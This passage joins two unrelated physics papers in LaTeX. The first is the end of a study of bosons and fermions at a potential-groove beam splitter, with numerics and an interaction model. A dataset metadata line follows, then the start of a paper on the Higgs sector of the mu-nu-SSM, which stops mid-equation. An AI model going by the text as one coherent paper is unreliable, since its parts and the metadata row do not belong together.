$U(0,0)\propto d_0^2$ so that we expect
\begin{equation}
\log T\sim -\kappa ^{\prime }d_0^2+\rm{const}. \label{a9}
\end{equation}
In order to acquire a heuristic understanding of the physics involved in the
coupling of the grooves at $z=0,$ we look at the lowest eigenfunctions
of the double well potential. These are expected to be symmetric,
$\psi _S$, with energy $E_S$, and antisymmetric, $\psi _A$, with
energy $E_A$, as shown in Fig. \ref{eigen}.
We have $E_A>E_S$ and hence we write
\begin{eqnarray}
E_A & = & \overline{E}+\hbar \Omega \nonumber\\
E_S & = & \overline{E}-\hbar \Omega,
\label{a11}
\end{eqnarray}
where $2\Omega $ is the tunneling frequency.
Using the eigenstates we form the localized states
\begin{eqnarray}
\varphi _L & = & \frac 1{\sqrt{2}}\left( \psi _S+\psi _A\right) \nonumber\\
\varphi _R & = & \frac 1{\sqrt{2}}\left( \psi _S-\psi _A\right),
\label{a12}
\end{eqnarray}
where the subscripts $L$ $(R)$ denote left (right) localization.
We can easily integrate the time evolution by using the energy
eigenstates. If we now assume that we start from $\varphi _L$ at time
$t=0$, then
\begin{eqnarray}
\Psi (t) & = & \exp \left( -iHt/\hbar \right) \varphi _L \nonumber \\
& = & {1\over\sqrt{2}} \exp \left( -i\overline{E}t/\hbar \right)\left(
e^{i\Omega t}\psi _S+e^{-i\Omega t}\psi _A\right) \label{a13}\\
& = & \exp \left( -i\overline{E}t/\hbar \right) \left( \cos \Omega
t\,\varphi _L+i\sin \Omega t\,\varphi _R\right) .\nonumber
\end{eqnarray}
This displays the expected flipping back and forth between the two wells.
For
\begin{equation}
\Omega t_0=\frac \pi 4 \label{a14}
\end{equation}
the coupling performs the action of a 50-50 beam splitter.
We now move to consider the action of such a potential configuration on a
two particle initial state. We first choose the bosonic one
\begin{equation}
\Psi _0^B=\frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)+\varphi
_L(2)\varphi _R(1)\right) , \label{a15}
\end{equation}
where the argument denotes the coordinates of the particle. This can be
expressed as
\begin{equation}
\Psi _0^B=\frac 1{\sqrt{2}}\left( \psi _S(1)\psi _S(2)-\psi _A(1)\psi
_A(2)\right) , \label{a16}
\end{equation}
which can be evolved in time straightforwardly to give
\begin{eqnarray}
\exp \left( -iHt_0/\hbar \right) \Psi _0^B & = &{1\over \sqrt{2}}
\exp \left( -i2\overline{E}t_0/\hbar \right) \left( e^{i2\Omega t_0}\psi
_S(1)\psi _S(2)-e^{-i2\Omega t_0}\psi _A(1)\psi _A(2)\right) \nonumber\\
& = & {i\over\sqrt{2}}\exp \left( -i2\overline{E}t_0/\hbar \right)
\left( \varphi _L(1)\varphi _L(2)+\varphi _R(2)\varphi _R(1)\right) .
\label{a17}
\end{eqnarray}
As we see, the bosonic two particle
state works as in Eq. (\ref{a4}): both particles emerge together.
In the fermionic case we have
\begin{eqnarray}
\Psi _0^F & = & \frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)-\varphi
_L(2)\varphi _R(1)\right)\nonumber\\
& = & \frac 1{\sqrt{2}}\left( \psi _A(1)\psi _S(2)-\psi _S(1)\psi
_A(2)\right) . \label{a18}
\end{eqnarray}
Because both states $\psi _A\psi _S$ and $\psi_S\psi_A$
evolve with the energy $2\overline{E}$, $\Psi _0^F$
remains uncoupled to other states. Thus the fermions emerge at
separate exit channels as expected.
\section{Numerical work}
\subsection{The Schr\"{o}dinger equation}
\label{num}
The Schr\"{o}dinger equation in the two-dimensional system is of the form
\begin{equation}
i\hbar \frac \partial {\partial t}\Psi (x,z,t)=\left[ -\frac{\hbar ^2}{2m
}\left( \frac{\partial ^2}{\partial x^2}+\frac{\partial ^2}{\partial z^2}
\right) +U(x,z)\right] \Psi (x,z,t). \label{a19}
\end{equation}
As a preparation for the numerical work, we introduce the scaling parameters
$\tau $ and $\xi $ giving the dimensionless variables
\begin{eqnarray}
\widetilde{x} & = & x/\xi \nonumber\\
\widetilde{z} & = & z/\xi \label{a20} \\
\widetilde{t} & = & t/\tau \nonumber \\
\widetilde{p} & = & \tau p/m\xi .\nonumber
\end{eqnarray}
We apply this to the one-dimensional oscillator Hamiltonian
\begin{equation}
H=\frac{p^2}{2m}+\frac 12m\omega ^2x^2 \label{a21}
\end{equation}
and find the Schr\"{o}dinger equation
\begin{equation}
i\left( \frac{\hbar \tau }{m\xi ^2}\right) \frac \partial {\partial
\widetilde{t}}\Psi =\left( \frac{\widetilde{p}^2}2+\frac 12\widetilde{\omega
}^2\widetilde{x}^2\right) \Psi . \label{a22}
\end{equation}
The dimensionless oscillator frequency is given by
$\widetilde{\omega }=\omega \tau $. This shows that choosing the
scaling units suitably, we can
tune the effective dimensionless Planck constant
\begin{equation}
\widetilde{\hbar }=\frac{\hbar \tau }{m\xi ^2}. \label{a23}
\end{equation}
To check the consistency of this we calculate
\begin{equation}
\left[ \widetilde{x},\widetilde{p}\right] =\left( \frac 1\xi \right) \left(
\frac \tau {m\xi }\right) \left[ x,p\right] =i\widetilde{\hbar }.
\label{a24}
\end{equation}
This gives us a way of controlling the quantum effects in the numerical
calculations.
In our numerical calculations we employ the split operator method \cite{split}
\begin{equation}
\exp \left[ -i(T+U)\Delta t/\hbar \right] \approx
\exp \left[ -iT\Delta t/\hbar \right]
\exp \left[ -iU\Delta t/\hbar \right] . \label{a25}
\end{equation}
The corrections to this are given by
\begin{equation}
\left[ T,U\right] \frac{\Delta t^2}{2\hbar ^2}=
\left|\left( \frac{\widetilde{\Delta t}^2\widetilde{\omega}^2}4\right)
\left(\frac{\widetilde{x}\,\widetilde{p}+\widetilde{p}\,\widetilde{x}}
{\widetilde{\hbar }}\right)\right| .
\label{a26}
\end{equation}
In order to achieve satisfactory numerical accuracy, this should not be too
large; in our calculations, with $\Delta t=0.001$,
$\widetilde{\omega}=30$ and $\widetilde{\hbar}=6$
the expectation value of expression (\ref{a26}) is of the order of $10^{-4}$.
Decreasing $\Delta t$ or the grid spacing has been found not to change
our results significantly.
In the following discussion, we use the scaled variables, but for
simplicity, we do not indicate this in the notation. Whenever variables
are assigned dimensionless values, these refer to the scaled versions.
In order to achieve beam splitter operation, we let the distance between the
potential wells vary in the following way
\begin{equation}
d(z)=2+d_0-\frac 2{\cosh (z/\eta)}, \label{a27}
\end{equation}
which inserted into Eq. (\ref{a7}) gives a potential surface as shown in Fig.
\ref{pot}. To test its operation as beam splitter,
we let a wave packet approach the
coupling region in one of the channels, and follow its progress through the
intersection numerically as a two-dimensional problem. The result is shown
in Fig. \ref{2dwave}. We see that the parameters chosen lead to ideal
50-50 splitting of
the incoming wave packet. The progress of the wave packet through the
interaction region is steady and nearly uniform, and no backscattering is
observed. This suggest simplifying the situation so that the motion in the
$z$-direction is replaced by a constant velocity, and the full quantum problem
is computed only in the $x$-direction. If the wave packet is long enough in
the $z$-direction, its velocity is well defined, and this should be a good
approximation.
The implementation of such a paraxial approach becomes imperative when we
want to put two particles into the structure. The full two-dimensional
integration would require the treatment of four degrees of freedom, which is
demanding on the computer resources. With the paraxial approximation,
two particles can be treated by a two-dimensional numerical approach,
which is within the resources available.
To introduce the paraxial approximation, we perform a Galilean
transformation of the wave function to a co-moving frame
\begin{equation}
\psi (x,z,t)=\varphi (x,\varsigma ,t)\exp \left[ \frac i{\hbar }\left(
p_0z-\frac{p_0^2t}{2m}\right) \right] , \label{a28}
\end{equation}
where
\begin{equation}
\varsigma =z-\frac{tp_0}m. \label{a29}
\end{equation}
The initial momentum in the $z$-direction is denoted by $p_0$. The new wave
function is found to obey the Schr\"{o}dinger equation
\begin{equation}
i\hbar \frac \partial {\partial t}\varphi (x,\varsigma ,t)=\left[ -\frac{
\hbar ^2}{2m}\left( \frac{\partial ^2}{\partial x^2}+\frac{\partial ^2}{
\partial \varsigma ^2}\right) +U\left( x,\varsigma +\frac{tp_0}m\right)
\right] \varphi (x,\varsigma ,t). \label{a30}
\end{equation}
For a well defined momentum $p_0$, the wave packet is very broad in the
$\varsigma $-direction and its derivatives with respect to $\varsigma $ may
be neglected. The corresponding degree of freedom disappears, and it is
replaced by a potential sweeping by with velocity $p_0/m.$ This is what we
call the paraxial approximation.
Taking the parameters from the integration in Fig. \ref{2dwave}, we
can obtain the beam splitting operation also in the paraxial
approximation as shown in Fig. \ref{1dwave}.
The transfer of the wave packet from one well to the linear superposition is
shown in Fig. \ref{probsplit}. This proves that the potential
configuration works exactly as in the analytic result (\ref{a13}).
Now the integration is one-dimensional for a single particle, and it is easy
to investigate the tunneling probability as a function of the parameters. In
Fig. \ref{T} we display the transition rate $T$ as a function of the
parameter $d_0^2$,
which controls the coupling between the wells. For small values,
$d_0^2 < 3,$
we are in a coherent flipping region; the wave packet is transferred back
and forth between the wells and resonant transmission occurs. For larger
values, $d_0^2 > 3,$ the analytic estimate of a logaritmic dependence in
Eq. (\ref{a9}) is seen to hold approximately. Our calculations work at
$d_0=1.8903$, which gives $T=1/2$.
\subsection{Effects of quantum statistics }
We can now integrate the propagation of a two-particle wave function by
choosing the initial state to be combinations of
\begin{equation}
\varphi _{L(R)}^0(x)=N\exp \left[ -{\omega\over{2\hbar}}
\left( x\pm (1+{1\over 2}d_0)\right)^2 \right] , \label{a31}
\end{equation}
where the $+$ $(-)$ refers to the particle entering in the left (right)
channel. For bosons, this is used in the combination (\ref{a15}) and
integrated in the potential (\ref{a7}), where the $z-$dependence is replaced
by a $t-$dependence according to Eq. (\ref{a30}). The result is shown in
Fig. \ref{boseV0}. At $t=-10$, the bosons enter symmetrically in the
two input channels,
i.e. they have different signs for their coordinates. After being mixed at
time $t=0$, they emerge together with equal strength at both output
channels, i.e. their coordinates have the same sign. This result fully
reproduces the behavior expected from bosons at a 50-50 beam splitter.
We can, however, also test the fermionic case by using the state (\ref{a18})
as the initial one. The result is shown in Fig. \ref{fermiV0}.
Near $t=0$, the wave
packets follow the potential wells, but they remain separated and emerge at
different outputs as expected. Fermions do not like to travel together.
We have thus been able to verify the properties of a 50-50 beam splitter on
massive particles represented by wave packets travelling in potential
structures. The calculations in Figs. (\ref{boseV0}) and (\ref{fermiV0})
do not, however, include any
particle interactions. We can now proceed to include these, and evaluate
their effect on the manifestations of quantum statistics.
When we introduce the interaction, we have to decide which type of physical
system we have in mind. Conduction electrons or ions interact through the
Coulomb force whereas neutral atom interactions may be described by a force
of the Lennard-Jones form. In both cases, the interaction is singular at the
origin, and it has to be regularized there. We do this by introducing the
variable
\begin{equation}
r_\varepsilon =\sqrt{r^2+\varepsilon ^2}. \label{a32}
\end{equation}
This makes the interaction energy finite when the particles overlap,
but does not affect the main part of our argument in other ways.
With this notation the Coulomb interaction is written
\begin{equation}
V_C(r)=\frac{V_0}{r_\varepsilon }, \label{a33}
\end{equation}
and the Lennard-Jones interaction is
\begin{equation}
V_{LJ}(r)=V_0\left[ \left( \frac b{r_\varepsilon }\right) ^{12}-\left( \frac
b{r_\varepsilon }\right) ^6\right] ; \label{a34}
\end{equation}
this contains the additional range parameter $b$. In both cases, the strength
of the interaction is regulated by $V_0.$
It is straightforward to integrate the Schr\"{o}dinger equation with the
two-particle interaction included, and look how its increase affects the
correlations imposed by quantum statistics. For fermions, the effect is
essentially not seen in the parameter ranges we are able to cover. As seen
from Fig. \ref{fermiV0}, the particles never really approach each other,
and they
remain separated due to their quantum statistics for all times; the
interaction does not affect them.
For bosons the effect is different. We have investigated their behavior for
a range of interaction parameters and find that an increase in the
interaction does destroy the simple behaviors found for noninteracting ones.
The result of such an integration is found in
Fig. \ref{boseV50}. Compared with Fig. \ref{boseV0}
this shows that now the particles appear in separate channels with about the
same probability as in the same channels. Thus the statistical effect has
been destroyed. Fig. \ref{probV50} shows how the result emerges during the time
evolution; the system tries to achieve the ideal case, but settles to the
final state observed in Fig. \ref{boseV50}.
Figure \ref{ljint} shows how an increase in the interaction strength
destroys the ideal
behavior. This is drawn using a Lennard-Jones potential, but the behavior
is similar for other cases we have investigated.
One unexpected feature emerged from our calculations: The destruction of the
ideal behavior turned out to be independent of the sign of the interaction.
One may have expected an attractive interaction between the bosons to
enhance their tendency to appear together, but this turned out not to be the
case. In order to understand this feature we have to turn to our simple
analytic argument in Sec. \ref{smod} and investigate the interplay between
two-particle states and the interaction.
\section{Statistics versus interactions}
In order to introduce the particle interaction, we choose a convenient basis
for the two-particle states. As the first component we choose the bosonic
state (\ref{a15})
\begin{equation}
u_1=\frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)+\varphi _L(2)
\varphi_R(1)\right) . \label{a35}
\end{equation}
In addition, there are two more bosonic states, where the particles enter in
the same channels
\begin{eqnarray}
u_2 & = & \frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _L(2)+\varphi
_R(2)\varphi _R(1)\right) \\
& = & \frac 1{\sqrt{2}}\left( \psi _A(1)\psi _A(2)+\psi _S(1)\psi
_S(2)\right)
\label{a36}
\end{eqnarray}
and
\begin{eqnarray}
u_3 & = & \frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _L(2)-\varphi
_R(2)\varphi _R(1)\right)\label{a37} \\
& = & \frac 1{\sqrt{2}}\left( \psi _S(1)\psi _A(2)+\psi _A(1)\psi
_S(2)\right) .\nonumber
\end{eqnarray}
As the last component we have the fermionic basis function (\ref{a18})
\begin{equation}
u_4=\frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)-\varphi _L(2)\varphi
_R(1)\right) . \label{a38}
\end{equation}
Together the functions $\{u_i\}$ form a complete Bell state basis for the
problem. They are also convenient for the introduction of particle
interactions. In the states $u_1$ and $u_4$ the wave functions overlap only
little, and the effect of the interaction is small. For the states
$u_2$ and $u_3$ they sit on top of each other and feel the interaction
strongly. We treat this in a Hubbard-like fashion by saying that the energy
of the latter states is changed by the value 2$\overline{V}\propto V_0$.
Because the overlap between $\varphi_L$ and $\varphi_R$ is small, we have
$(u_1,Vu_1)\approx (u_4,Vu_4)$ and $(u_2,Vu_2)\approx (u_3,Vu_3)$, and
we can use the definition
\begin{eqnarray}
2\overline{V}&=&{1\over 2}\left[(u_2,Vu_2)+(u_3,Vu_3)-
(u_1,Vu_1)-(u_4,Vu_4)\right]\\
&\approx&\int\int\varphi(x)^2\varphi(y)^2 V(|x-y|) dx dy-
\int\int\varphi(x)^2\varphi(y-d_0)^2 V(|x-y|) dx dy, \nonumber
\end{eqnarray}
where $V$ is either a Coulomb or Lennard-Jones interaction.
The first terms give the effective interaction energy when both
particles sit in the same potential groove. In the states $u_1$ and
$u_4$ both grooves are occupied and because they are at their closest
at $z=0$, we subtract the mutual interaction energy across the
separating barrier to obtain the pure local interaction energy.
The second line results if we approximate both $\varphi_L$ and
$\varphi_R$ by a Gaussian $\varphi$ with the same width. From
Eq. (\ref{a17}) we see that only the states $u_1$ and $u_2$ are coupled by
the tunneling rate $2\Omega .$ Thus if we express the state by
\begin{equation}
\Psi =a_1u_1+a_2u_2+a_3u_3+a_4u_4, \label{a39}
\end{equation}
the state vector $[a_1,a_2,a_3,a_4]$ evolves with the Hamiltonian
\begin{equation}
\left[
\begin{array}{cccc}
2\overline{E} & -2\hbar\Omega & 0 & 0 \\
-2\hbar\Omega & 2\overline{E}+2\overline{V} & 0 & 0 \\
0 & 0 & 2\overline{E}+2\overline{V} & 0 \\
0 & 0 & 0 & 2\overline{E}
\end{array}
\right] =2 \overline{E}+\overline{V} +\left[
\begin{array}{cccc}
-\overline{V} & -2\hbar\Omega & 0 & 0 \\
-2\hbar\Omega & \overline{V} & 0 & 0 \\
0 & 0 & \overline{V} & 0 \\
0 & 0 & 0 & -\overline{V}
\end{array}
\right] . \label{a40}
\end{equation}
The constant part does not affect the coupling between the states, and the
amplitudes $a_3$ and $a_4$ decouple. The remaining ones flip at the
effective rate
\begin{equation}
\Omega _{\rm{eff}}=\frac 12\sqrt{4\Omega^2
+\overline{V}^2/\hbar^2 }. \label{a41}
\end{equation}
This result shows that the new parameter replacing $\Omega$ in
Eq. (\ref{a11}) is $\Omega
_{\rm{eff}},$ implying that the perfect boson behavior is expected to be
destroyed for
\begin{equation}
\frac{\overline{V}}{2\hbar\Omega }\sim \sqrt{3}=1.73. \label{a42}
\end{equation}
This is in approximate agreement with the result shown in Fig. \ref{ljint}.
By inspecting Fig. \ref{probV50}, we can also verify that the flipping
does occur
faster when we switch on the interaction, as expected from Eq. (\ref{a41}).
In the simplified analytic treatment, the only influence of the potential
was through its strength $| \overline{V}| .$ Hence we expect the
results to scale with the parameter
$\left( | \overline{V}| /2\hbar\Omega
\right) $ where $2\hbar\Omega =E_A-E_S.$
The probability to emerge in the same
output channels should essentially depend on this only; a certain
universality is expected.
In Fig. \ref{univ}, we have plotted this probability for a variety
of potentials including both Coulomb and Lennard-Jones ones. As we
can see, the behavior is very similar, at
$\left( | \overline{V}| /2\hbar\Omega \right)\approx 1.7$
the probability has decreased to less than 10\% in agreement with our
expectation. This verifies the degree of universality achieved.
For comparison, we also used the simple analytic theory to obtain the
points along the curve.
In this treatment, $2\Omega$ was assumed to be constant during
some finite coupling time $t$, according to Eq. (\ref{a14}). By inspecting
Fig. \ref{probsplit}, we conclude that $t$ should be of the order of unity.
Here $2\hbar\Omega$ was chosen to be 8, and the time
evolution in the subspace $\{ u_1, u_2 \} $ was calculated. This
agrees best with the numerical results for small $\overline{V}$; for larger
values of $\overline{V}$ the simple analytic treatment becomes invalid.
\section{Discussion and Conclusions}
The actual values of $\xi$, $\tau$, $m$ and $\omega$ depend on the
physical system we have in mind. Our calculations are carried out at
$\widetilde{\omega}=30$ and $\widetilde{\hbar}=6$; the momentum in the
$z$-direction of the incoming wave packet is $\widetilde{p}_z=30$ or
$\widetilde{p}_z=1000$.
If we consider an atomic beam splitter for Rb atoms,
setting the length scale $\xi$ to 100~nm corresponds to a time scale
$\tau$ of $80~\mu$s according to Eq. (\ref{a23}). A displacement of
400~nm from the center of one valley in the $x$-direction gives
a potential energy increase of roughly 10~mK, i.e. a transverse
velocity of 0.15~m/s. This is to be compared with a typical height of
the confining potential in a hollow optical fiber, a few tens of
mK \cite{ito,yin}. Taking $\widetilde{p}_z=1000$ yields a beam
velocity of 1.3~m/s in the $z$-direction.
If we consider a mesoscopic electron beam splitter built on GaAs,
$\xi$ could be of the order of 40 nm, which means that the closest
distance $d_0$ between the valleys is 80 nm. This would correspond to
$\tau=6$ ps, i.e. the electron goes through the device in a few
picoseconds. With $\widetilde{p}_z=30$, the
kinetic energy of the electron due to the
motion in the $z$-direction would be of the order of 0.01~eV.
A displacement of 100 nm from the
center of one valley in the $x$-direction corresponds to a potential
energy increase of roughly 0.05~eV, in comparison with the
bandgap in GaAs, 0.115~eV.
The parameter ranges chosen in our illustrative computations may not
be experimentally optimal, but they indicate that the effects are not
totally outside the range of real systems. Even if our calculations
are based on a rather simplified model, we find them suggesting
effects possible in realistic setups. The main problem is to
prepare the appropriate quantum states, launch them into the structures
and retain their quantum coherence during the interaction. With atomic
cooling and trapping techniques, this may be feasible in the near
future. For electrons the possibility to retain quantum coherence is
still an open question.
We have chosen to discuss the straightforward question of particle
statistics
at a beam splitter. This is a simple situation, which, however,
presents genuine quantum features. For information processing and
quantum logic slightly more complicated networks are needed. Simple
gate operation can be achieved along the lines described in
Ref. \cite{kir}, which was formulated in terms of conduction
electrons, but similar situations can be envisaged for interacting
atoms.
In this paper we suggest an analytic model, which can be used to analyze
the behavior of particle networks confined to potential grooves in
two-dimensional structures as discussed also by Schmiedmayer
\cite{sch}. For complicated situations, the full numerical treatment
rapidly becomes intractable and simplified qualitative tools are
needed. We hope to have contributed to the development of such methods
in the present paper.
\acknowledgments
One of us (SS) thanks Dr. J\"org Schmiedmayer for inspiring
discussions. MTF thanks Patrick Bardroff for fruitful discussions.
| 2024-02-18T23:40:16.218Z | 1998-11-09T15:50:10.000Z | algebraic_stack_train_0000 | 1,880 | 5,499 |
|
proofpile-arXiv_065-9402 | \section{Introduction\label{sec1}}
\indent
Since the ATLAS and CMS Collaborations reported the significant discovery of a new neutral Higgs boson~\cite{ATLAS,CMS}, the Higgs boson mass is now precisely measured by~\cite{ATLAS-CMS}
\begin{eqnarray}
m_h=125.09\pm 0.24\: {\rm{GeV}}.
\end{eqnarray}
Therefore, the accurate Higgs boson mass will give most stringent constraints on parameter space for the standard model and its various extensions.
As a supersymmetric model, the ``$\mu$ from $\nu$ supersymmetric standard model'' ($\mu\nu$SSM) has the superpotential:~\cite{mnSSM,mnSSM1,mnSSM2,ref-zhang1,ref-zhang-LFV,ref-zhang2,ref-zhang-HLFV}
\begin{eqnarray}
&&W={\epsilon _{ab}}\left( {Y_{{u_{ij}}}}\hat H_u^b\hat Q_i^a\hat u_j^c + {Y_{{d_{ij}}}}\hat H_d^a\hat Q_i^b\hat d_j^c
+ {Y_{{e_{ij}}}}\hat H_d^a\hat L_i^b\hat e_j^c + {Y_{{\nu _{ij}}}}\hat H_u^b\hat L_i^a\hat \nu _j^c \right)
\nonumber\\
&&\hspace{0.95cm}- {\epsilon _{ab}}{\lambda _i}\hat \nu _i^c\hat H_d^a\hat H_u^b + \frac{1}{3}{\kappa _{ijk}}\hat \nu _i^c\hat \nu _j^c\hat \nu _k^c \:,
\label{eq-W}
\end{eqnarray}
where $\hat H_u^T = \Big( {\hat H_u^ + ,\hat H_u^0} \Big)$, $\hat H_d^T = \Big( {\hat H_d^0,\hat H_d^ - } \Big)$, $\hat Q_i^T = \Big( {{{\hat u}_i},{{\hat d}_i}} \Big)$, $\hat L_i^T = \Big( {{{\hat \nu}_i},{{\hat e}_i}} \Big)$ are $SU(2)$ doublet superfields, and $Y_{u,d,e,\nu}$, $\lambda$, and $\kappa$ are dimensionless matrices, a vector, and a totally symmetric tensor, respectively. $a,b=1,2$ are SU(2) indices with antisymmetric tensor $\epsilon_{12}=1$, and $i,j,k=1,2,3$ are generation indices. The summation convention is implied on repeated indices in this paper.
Besides the superfields of the MSSM~\cite{MSSM,MSSM1,MSSM2,MSSM3,MSSM4}, the $\mu\nu$SSM introduces three singlet right-handed neutrino superfields $\hat{\nu}_i^c$ to solve the $\mu$ problem~\cite{m-problem} of the MSSM. Once the electroweak symmetry is broken (EWSB), the effective $\mu$ term $-\epsilon _{ab} \mu \hat H_d^a\hat H_u^b$ is generated spontaneously through right-handed sneutrino vacuum expectation values (VEVs), $\mu = {\lambda _i}\left\langle {\tilde \nu _i^c} \right\rangle$. Additionally, three tiny neutrino masses can be generated at the tree level through a TeV scale seesaw mechanism~\cite{mnSSM,mnSSM1,mnSSM2,ref-zhang1,ref-zhang-LFV,ref-zhang2,meu-m,meu-m1,meu-m2,meu-m3,
neu-zhang1,neu-zhang2,ref-zhang3}.
In the $\mu\nu$SSM, the left- and right-handed sneutrino VEVs lead to the mixing of the neutral components of the Higgs doublets with the sneutrinos producing an $8\times8$ CP-even neutral scalar mass matrix, which can be seen in Refs.~\cite{mnSSM1,mnSSM2,ref-zhang1}. Therefore, the mixing would affect the lightest Higgs boson mass. In this work, we analytically diagonalize the CP-even neutral scalar mass matrix, which would be conducive to the follow-up study on the Higgs sector. In the meantime, we consider the Higgs boson mass corrections with effective potential methods. We also give an approximate expression for the lightest Higgs boson mass. In numerical analysis, we will analyze how the mixing affects the lightest Higgs boson mass.
Our presentation is organized as follows. In Sec.~\ref{sec2}, we briefly summarize the Higgs sector of the $\mu\nu$SSM, including the Higgs boson mass corrections. We present the diagonalization of the neutral scalar mass matrix analytically in Sec.~\ref{sec3}. The numerical analyses are given in Sec.~\ref{sec-num}, and Sec.~\ref{sec-sum} provides a summary. The tedious formulas are collected in the Appendixes.
\section{The Higgs sector\label{sec2}}
\indent
The Higgs sector of the $\mu\nu$SSM contains the usual two Higgs doublets with the left- and right-handed sneutrinos: $\hat H_d^T = \Big( {\hat H_d^0,\hat H_d^ - } \Big)$, $\hat H_u^T = \Big( {\hat H_u^ + ,\hat H_u^0} \Big)$, $\hat{\nu}_i$ and $\hat{\nu}_i^c$. Once EWSB, the neutral scalars have the VEVs:
\begin{eqnarray}
\langle H_d^0 \rangle = \upsilon_d , \qquad \langle H_u^0 \rangle = \upsilon_u , \qquad
\langle \tilde \nu_i \rangle = \upsilon_{\nu_i} , \qquad \langle \tilde \nu_i^c \rangle = \upsilon_{\nu_i^c} .
\end{eqnarray}
One can define the neutral scalars as
\begin{eqnarray}
&&H_d^0=\frac{1}{\sqrt{2}} \Big(h_d + i P_d \Big) + \upsilon_d, \qquad\; \tilde \nu_i = \frac{1}{\sqrt{2}} \Big((\tilde \nu_i)^\Re + i (\tilde \nu_i)^\Im \Big) + \upsilon_{\nu_i}, \nonumber\\
&&H_u^0=\frac{1}{\sqrt{2}} \Big(h_u + i P_u \Big) + \upsilon_u, \qquad \tilde \nu_i^c = \frac{1}{\sqrt{2}} \Big((\tilde \nu_i^c)^\Re + i (\tilde \nu_i^c)^\Im \Big) + \upsilon_{\nu_i^c},
\end{eqnarray}
Considering that the neutrino oscillation data constrain neutrino Yukawa couplings $Y_{\nu_i} \sim \mathcal{O}(10^{-7})$ and left-handed sneutrino VEVs $\upsilon_{\nu_i} \sim \mathcal{O}(10^{-4}{\rm{GeV}})$~\cite{mnSSM,mnSSM1,mnSSM2,ref-zhang1,meu-m,meu-m1,meu-m2,meu-m3,
neu-zhang1,neu-zhang2}, in the following we could reasonably neglect the small terms including $Y_{\nu}$ or $\upsilon_{\nu_i}$ in the Higgs sector. Then, the superpotential in Eq.~(\ref{eq-W}) approximately leads to the tree-level neutral scalar (Higgs) potential:
\begin{eqnarray}
V^0=V_F+V_D+V_{soft},
\end{eqnarray}
with
\begin{eqnarray}
&&V_F=\lambda_i \lambda_i^* H_d^0 H_d^{0*} H_u^0 H_u^{0*}+\lambda_i \lambda_j^* \tilde\nu_i^c \tilde\nu_j^{c*} (H_d^0 H_d^{0*}+ H_u^0 H_u^{0*})\nonumber\\
&&\hspace{1.0cm} + \, \kappa_{ijk}\kappa_{ljm}^* \tilde\nu_i^c \tilde\nu_k^{c} \tilde\nu_l^{c*} \tilde\nu_m^{c*} - ( \kappa_{ijk}\lambda_j^* \tilde\nu_i^c \tilde\nu_k^{c} H_d^{0*} H_u^{0*}+ {\rm{H.c.}}),\\
&&V_D=\frac{G^2}{8}(\tilde\nu_i \tilde\nu_i^{*} +H_d^0 H_d^{0*}- H_u^0 H_u^{0*})^2,\\
&&V_{soft}=m_{{H_d}}^{2} H_d^0 H_d^{0*} + m_{{H_u}}^2 H_u^0 H{_u^{0*}}
+ m_{{{\tilde L}_{ij}}}^2\tilde \nu_i \tilde\nu_j^{*} + m_{\tilde \nu_{ij}^c}^2\tilde \nu{_i^{c}}\tilde \nu_j^{c*}\nonumber\\
&&\hspace{1.3cm} - \,\Big((A_{\lambda}\lambda)_i \nu{_i^{c}} H_d^0 H_u^{0} - \frac{1}{3} (A_{\kappa}\kappa)_{ijk} \tilde\nu{_i^{c}}\tilde \nu{_j^{c}}\tilde \nu{_k^{c}} + {\rm{H.c.}}\Big),
\end{eqnarray}
where $G^2=g_1^2+g_2^2$ and $g_1 c_{_W} =g_2 s_{_W}=e$, $V_F$ and $V_D$ are the usual $F$ and $D$ terms derived from the superpotential, and $V_{soft}$ denotes the soft supersymmetry breaking terms. For simplicity, we will assume that all parameters in the potential are real in the following.
With effective potential methods~\cite{Hi-1,Hi-2,Hi-3,Hi-4,Hi-5,Hi-6,Hi-7,Hi-8,Hi-alpha,Hi-9,Hi-10,Hi-11,Hi-12,Hi-13,Hi-14,Hi-15}, the one-loop effective potential can be given by
\begin{eqnarray}
&&V^1=\frac{1}{32\pi^2}\Big\{ \sum\limits_{\tilde f} N_f m_{\tilde f}^4 \Big( \log \frac{m_{\tilde f}^2}{Q^2} -\frac{3}{2}\Big) -2 \sum\limits_{f= t, b,\tau} N_f m_{f}^4 \Big( \log \frac{m_{f}^2}{Q^2} -\frac{3}{2}\Big) \Big\},
\end{eqnarray}
where, $Q$ denotes the renormalization scale, $N_t=N_b=3$ and $N_\tau=1$, $\tilde f=\tilde t_{1,2},\tilde b_{1,2},\tilde \tau_{1,2}$. The masses of the third fermions $f= t, b,\tau$ and corresponding supersymmetric partners $\tilde f=\tilde t_{1,2},\tilde b_{1,2},\tilde \tau_{1,2}$ in the $\mu\nu$SSM are collected in Appendix~\ref{app1}. Including the one-loop effective potential, the Higgs potential is written as
\begin{eqnarray}
V=V^0+V^1.
\end{eqnarray}
Through the Higgs potential, we will calculate the minimization conditions of the potential and the Higgs masses in the following.
Minimizing the Higgs potential, we can obtain the minimization conditions of the potential, linking the soft mass parameters to the VEVs of the neutral scalar fields:
\begin{eqnarray}
&&m_{{H_d}}^2= -\Delta T_{H_d} + ((A_\lambda \lambda)_i \upsilon_{\nu_i^c} + {\lambda _j}{\kappa _{ijk}}\upsilon_{\nu_i^c} \upsilon_{\nu_k^c} )\tan\beta \nonumber\\
&&\hspace{1.4cm} - \, ({\lambda _i}{\lambda _j}\upsilon_{\nu_i^c}\upsilon_{\nu_j^c} + {\lambda _i}{\lambda _i}\upsilon_u^2) + \frac{G^2}{4}( \upsilon_u^2 - \upsilon_d^2),\\
&&m_{{H_u}}^2= -\Delta T_{H_u} + ((A_\lambda \lambda)_i \upsilon_{\nu_i^c} + {\lambda _j}{\kappa _{ijk}}\upsilon_{\nu_i^c} \upsilon_{\nu_k^c})\cot\beta\nonumber\\
&&\hspace{1.4cm} - \, ({\lambda _i}{\lambda _j}\upsilon_{\nu_i^c}\upsilon_{\nu_j^c} + {\lambda _i}{\lambda _i}\upsilon_d^2) + \frac{{G^2}}{4}(\upsilon_d^2 - \upsilon_u^2) , \\
